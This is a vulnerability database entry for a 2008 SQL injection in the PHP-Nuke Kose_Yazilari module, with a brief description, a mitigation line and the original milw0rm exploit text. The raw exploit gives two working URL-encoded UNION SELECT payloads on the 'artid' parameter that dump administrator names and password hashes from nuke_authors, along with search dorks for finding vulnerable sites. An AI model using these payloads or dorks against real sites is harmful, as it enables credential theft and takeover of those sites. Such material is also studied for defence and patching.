PHP-Nuke (Kose_Yazilari) SQL Injection Vulnerability

vendor:

PHP-Nuke

by:

xcorpitx

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: PHP-Nuke

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

PHP-Nuke (Kose_Yazilari) SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'artid' parameter to 'modules.php' script. A remote attacker can execute arbitrary SQL commands in application's database, cause denial of service, access or modify data, exploit latent vulnerabilities in the underlying database and gain access to the administrative panel.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should sanitize all user-supplied input to prevent SQL injection attacks.

Source

Exploit-DB raw data:

  ##     ##     
   ##   ##      
    ## ##
     ###CoRPITX 
     ###     
    ## ##
   ##   ##
  ##     ##

########################### Turkey ####################################
#                                                                     #
#################### www.Hayalet-hack.com #############################
#
##################### www.zone-turk.net/###############################
#             
#  PHP-Nuke (Kose_Yazilari) SQL Injection Vulnerability 
#
#######################################################################
#  
#  AUTHOR : xcorpitx
#
#  HOME   : www.Hayalet-hack.com / www.zone-turk.net
#
########################################################################
# WHEN YOU PUT THIS SQL CODE YOU can SEE ADMÃ½N NAME,ADMIN HASH 
########################################################################
#
#  DorK  1 : ''name Kose_Yazilari op viewarticle artid''
#  Dork  2 : ''name Kose_Yazilari op printpage artid''
########################################################################
#            
#  EXPLOIT: 
#
########################################################################
# 
#
modules.php?name=Kose_Yazilari&op=viewarticle&artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors
#
# 
#
modules.php?name=Kose_Yazilari&op=printpage&artid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors
#
########################################################################

Thank my friends : pc faresi, hayalet,D3ng3s!z,SmoKin,apex,mostbiq

# milw0rm.com [2008-02-25]